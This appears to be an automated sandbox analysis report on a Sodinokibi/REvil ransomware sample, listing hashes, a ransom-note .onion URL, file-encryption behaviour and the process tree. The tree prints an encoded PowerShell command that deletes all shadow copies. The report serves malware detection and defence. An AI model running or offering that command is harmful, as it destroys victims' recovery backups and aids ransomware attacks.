Analysis
-
max time kernel
143s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
07-07-2022 21:44
Static task
static1
Behavioral task
behavioral1
Sample
43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe
Resource
win10v2004-20220414-en
General
-
Target
43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe
-
Size
164KB
-
MD5
f110035255ecf395f0d5fa1cd89bf15f
-
SHA1
e60d841b1630f1c6abc0060448ed718a92ec3b56
-
SHA256
43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4
-
SHA512
974d4babf66d1cd7d20fe61390b248c2251d403fe15d8e0b2eea29096db4ab83e8488bfbce82dceb725cda11bdd26284656394e8d30fa1cbf592973c8456691a
Malware Config
Extracted
C:\60jrl815t1.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/11FE1E49C1C4B6AB
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Modifies extensions of user files 3 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exedescription ioc process File renamed C:\Users\Admin\Pictures\UseComplete.raw => \??\c:\users\admin\pictures\UseComplete.raw.60jrl815t1 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File renamed C:\Users\Admin\Pictures\CloseRestore.tif => \??\c:\users\admin\pictures\CloseRestore.tif.60jrl815t1 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File renamed C:\Users\Admin\Pictures\ConvertToSwitch.png => \??\c:\users\admin\pictures\ConvertToSwitch.png.60jrl815t1 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exedescription ioc process File opened (read-only) \??\A: 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened (read-only) \??\E: 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened (read-only) \??\H: 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened (read-only) \??\S: 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened (read-only) \??\U: 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened (read-only) \??\W: 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened (read-only) \??\B: 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened (read-only) \??\G: 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened (read-only) \??\N: 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened (read-only) \??\O: 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened (read-only) \??\Q: 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened (read-only) \??\T: 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened (read-only) \??\V: 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened (read-only) \??\I: 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened (read-only) \??\J: 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened (read-only) \??\M: 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened (read-only) \??\R: 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened (read-only) \??\X: 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened (read-only) \??\F: 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened (read-only) \??\K: 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened (read-only) \??\L: 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened (read-only) \??\P: 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened (read-only) \??\Y: 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened (read-only) \??\Z: 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened (read-only) \??\D: 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\9v6m9g.bmp" 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe -
Drops file in Program Files directory 30 IoCs
Processes:
43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exedescription ioc process File opened for modification \??\c:\program files\SendStop.MTS 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\SubmitExport.mov 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\StartAssert.xlt 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\NewCompress.pps 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\PopDisable.vsd 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\RegisterOpen.pdf 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\RegisterRevoke.asf 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\ApprovePush.m1v 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\HideAssert.eps 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\EnableClear.rmi 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\RedoPublish.png 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\ResolveReceive.xlt 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\SaveEnable.dotx 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\SelectSkip.dotm 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\SplitDisconnect.vsw 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\ConvertSearch.bmp 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\EditResume.7z 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\SplitInstall.tif 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\SubmitAdd.dotx 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\WriteUnpublish.svgz 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\OutSend.vdw 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\ShowSave.wav 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\EditStop.mpp 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\RequestJoin.pot 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File created \??\c:\program files\60jrl815t1.txt 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\ConvertFromDisconnect.jpg 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\LockRead.nfo 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\SubmitUpdate.otf 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File created \??\c:\program files (x86)\60jrl815t1.txt 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe File opened for modification \??\c:\program files\EnterDisable.zip 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exepowershell.exepid process 2416 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe 2416 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe 4696 powershell.exe 4696 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 4696 powershell.exe Token: SeBackupPrivilege 1892 vssvc.exe Token: SeRestorePrivilege 1892 vssvc.exe Token: SeAuditPrivilege 1892 vssvc.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exedescription pid process target process PID 2416 wrote to memory of 4696 2416 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe powershell.exe PID 2416 wrote to memory of 4696 2416 43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe"C:\Users\Admin\AppData\Local\Temp\43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe"1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/4696-130-0x0000000000000000-mapping.dmp
-
memory/4696-131-0x00000256385D0000-0x00000256385F2000-memory.dmpFilesize
136KB
-
memory/4696-132-0x00007FFB09AA0000-0x00007FFB0A561000-memory.dmpFilesize
10.8MB
-
memory/4696-133-0x00007FFB09AA0000-0x00007FFB0A561000-memory.dmpFilesize
10.8MB